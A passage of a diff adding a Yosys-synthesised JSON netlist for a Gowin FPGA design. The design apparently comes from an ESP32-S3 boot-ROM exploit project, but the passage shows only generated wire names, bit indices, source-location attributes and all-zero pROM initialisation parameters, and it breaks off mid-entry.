"power_tx_reg_DFFS_Q_D_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 240 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst": { + "hide_name": 0, + "bits": [ 242, 241 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:24.11-24.14" + } + }, + "rst_DFF_Q_1_D": { + "hide_name": 0, + "bits": [ 244 ], + "attributes": { + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 245 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 247 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 248 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 246 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 249 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_1_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 250 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D": { + "hide_name": 0, + "bits": [ 243 ], + "attributes": { + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 251 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 253 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 254 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 252 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 257 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 258 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0": { + "hide_name": 0, + "bits": [ 241, 255, 256, 236, 235, 141 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 259 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 260 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0": { + "hide_name": 0, + "bits": [ 111, 114, 262, 263, 261 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0": { + "hide_name": 0, + "bits": [ 264 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.9-163.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 266 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 268 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 269 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 267 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 270 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 271 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1": { + "hide_name": 0, + "bits": [ 265 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.13-163.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 272 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 274 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 275 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 273 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 276 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 277 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running": { + "hide_name": 0, + "bits": [ 256, 255 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:25.11-25.18" + } + }, + "running_DFFS_Q_D": { + "hide_name": 0, + "bits": [ 278 ], + "attributes": { + } + }, + "running_DFF_Q_D": { + "hide_name": 0, + "bits": [ 279, 280, 236, 235 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "running_LUT4_I1_F": { + "hide_name": 0, + "bits": [ 138, 42, 236, 233, 235 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "running_LUT4_I1_F_LUT3_F_I2": { + "hide_name": 0, + "bits": [ 131, 133, 281 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 282 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 283 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0": { + "hide_name": 0, + "bits": [ 111, 114, 262, 263, 284 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0": { + "hide_name": 0, + "bits": [ 285 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.9-163.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 287 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 289 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 290 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 288 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 291 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I0_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 292 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:164.41-164.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1": { + "hide_name": 0, + "bits": [ 286 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:163.13-163.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 293 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 295 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 296 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 294 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 297 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT5_O_S0_MUX2_LUT7_O_I1_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 298 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:165.42-165.67|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 299 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 302 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 303 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 300 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 305 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 306 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "running_LUT4_I1_F_MUX2_LUT6_O_S0": { + "hide_name": 0, + "bits": [ 96, 99, 102, 105, 304, 301 ], + "attributes": { + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + } + } + }, + "pROM": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:670.1-743.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": 